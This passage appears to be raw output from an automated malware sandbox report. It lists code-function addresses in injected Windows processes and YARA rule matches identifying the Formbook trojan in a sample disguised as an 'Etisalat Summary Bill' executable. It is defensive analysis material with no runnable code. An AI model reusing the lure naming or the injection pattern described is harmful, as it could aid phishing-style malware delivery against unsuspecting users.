Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADCD1F	2_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0CB5	2_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30CF2	2_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40C00	2_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A8739A	2_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF132D	2_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2D34C	2_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A452A0	2_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE12ED	2_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B2C0	2_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4B1B0	2_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7516C	2_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2F172	2_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0B16B	2_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF70E9	2_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF0E0	2_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEF0CC	2_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A470C0	2_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF7B0	2_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF16CC	2_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85630	2_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADD5B0	2_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B095C3	2_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7571	2_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFF43F	2_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A31460	2_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FB80	2_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB5BF0	2_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7DBF9	2_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFB76	2_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADDAAC	2_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A85AA0	2_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE1AA3	2_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEDAC6	2_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB3A6C	2_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFA49	2_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7A46	2_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD5910	2_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49950	2_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5B950	2_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A438E0	2_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAD800	2_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFFB1	2_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A41F92	2_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A03FD2	2_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A03FD5	2_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFF09	2_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A49EB0	2_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5FDC0	2_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF7D73	2_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A43D40	2_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF1D5A	2_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFFCF2	2_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB9C32	2_2_03AB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6A036	2_2_03F6A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6B232	2_2_03F6B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F61082	2_2_03F61082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6E5CD	2_2_03F6E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F65B32	2_2_03F65B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F65B30	2_2_03F65B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F68912	2_2_03F68912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F62D02	2_2_03F62D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A8232	3_2_0E5A8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A7036	3_2_0E5A7036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E59E082	3_2_0E59E082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A5912	3_2_0E5A5912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E59FD02	3_2_0E59FD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A2B32	3_2_0E5A2B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A2B30	3_2_0E5A2B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5AB5CD	3_2_0E5AB5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10A84082	3_2_10A84082
Source: C:\Windows\explorer.exe	Code function: 3_2_10A8D036	3_2_10A8D036
Source: C:\Windows\explorer.exe	Code function: 3_2_10A915CD	3_2_10A915CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10A85D02	3_2_10A85D02
Source: C:\Windows\explorer.exe	Code function: 3_2_10A8B912	3_2_10A8B912
Source: C:\Windows\explorer.exe	Code function: 3_2_10A8E232	3_2_10A8E232
Source: C:\Windows\explorer.exe	Code function: 3_2_10A88B30	3_2_10A88B30
Source: C:\Windows\explorer.exe	Code function: 3_2_10A88B32	3_2_10A88B32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059E0591	4_2_059E0591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05920535	4_2_05920535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CE4F6	4_2_059CE4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C4420	4_2_059C4420
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D2446	4_2_059D2446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591C7C0	4_2_0591C7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05944750	4_2_05944750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05920770	4_2_05920770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593C6E0	4_2_0593C6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059E01AA	4_2_059E01AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D41A2	4_2_059D41A2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D81CC	4_2_059D81CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BA118	4_2_059BA118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910100	4_2_05910100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059A8158	4_2_059A8158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B2000	4_2_059B2000
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592E3F0	4_2_0592E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059E03E6	4_2_059E03E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DA352	4_2_059DA352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059A02C0	4_2_059A02C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C0274	4_2_059C0274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05938DBF	4_2_05938DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591ADE0	4_2_0591ADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BCD1F	4_2_059BCD1F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592AD00	4_2_0592AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C0CB5	4_2_059C0CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05910CF2	4_2_05910CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05920C00	4_2_05920C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0599EFA0	4_2_0599EFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05912FC8	4_2_05912FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592CFE0	4_2_0592CFE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05940F30	4_2_05940F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C2F30	4_2_059C2F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05962F28	4_2_05962F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05994F40	4_2_05994F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05932E90	4_2_05932E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DCE93	4_2_059DCE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DEEDB	4_2_059DEEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DEE26	4_2_059DEE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05920E59	4_2_05920E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059229A0	4_2_059229A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059EA9A6	4_2_059EA9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05936962	4_2_05936962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059068B8	4_2_059068B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0594E8F0	4_2_0594E8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05922840	4_2_05922840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592A840	4_2_0592A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D6BD7	4_2_059D6BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DAB40	4_2_059DAB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591EA80	4_2_0591EA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BD5B0	4_2_059BD5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059E95C3	4_2_059E95C3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D7571	4_2_059D7571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DF43F	4_2_059DF43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05911460	4_2_05911460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DF7B0	4_2_059DF7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D16CC	4_2_059D16CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05965630	4_2_05965630
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592B1B0	4_2_0592B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0590F172	4_2_0590F172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059EB16B	4_2_059EB16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0595516C	4_2_0595516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CF0CC	4_2_059CF0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059270C0	4_2_059270C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D70E9	4_2_059D70E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DF0E0	4_2_059DF0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0596739A	4_2_0596739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D132D	4_2_059D132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0590D34C	4_2_0590D34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059252A0	4_2_059252A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593B2C0	4_2_0593B2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C12ED	4_2_059C12ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593FDC0	4_2_0593FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D1D5A	4_2_059D1D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05923D40	4_2_05923D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D7D73	4_2_059D7D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DFCF2	4_2_059DFCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05999C32	4_2_05999C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05921F92	4_2_05921F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DFFB1	4_2_059DFFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DFF09	4_2_059DFF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05929EB0	4_2_05929EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B5910	4_2_059B5910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05929950	4_2_05929950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593B950	4_2_0593B950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059238E0	4_2_059238E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0598D800	4_2_0598D800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0593FB80	4_2_0593FB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05995BF0	4_2_05995BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0595DBF9	4_2_0595DBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DFB76	4_2_059DFB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05965AA0	4_2_05965AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BDAAC	4_2_059BDAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C1AA3	4_2_059C1AA3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CDAC6	4_2_059CDAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DFA49	4_2_059DFA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059D7A46	4_2_059D7A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05993A6C	4_2_05993A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050B2D90	4_2_050B2D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050B2FB0	4_2_050B2FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050B9E60	4_2_050B9E60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0564A036	4_2_0564A036
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05642D02	4_2_05642D02
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0564E5CD	4_2_0564E5CD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05648912	4_2_05648912
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05641082	4_2_05641082
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05645B30	4_2_05645B30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05645B32	4_2_05645B32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0564B232	4_2_0564B232

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0599F290 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05955130 appears 58 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0590B970 appears 280 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05967E54 appears 111 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0598EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: String function: 008BF9F2 appears 40 times
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: String function: 008C0A30 appears 46 times
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: String function: 008A9CB3 appears 31 times

Source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2021962175.0000000003DD3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Etisalat Summary Bill for the Month of August.exe
Source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2023484684.0000000003FAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Etisalat Summary Bill for the Month of August.exe

Source: Etisalat Summary Bill for the Month of August.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
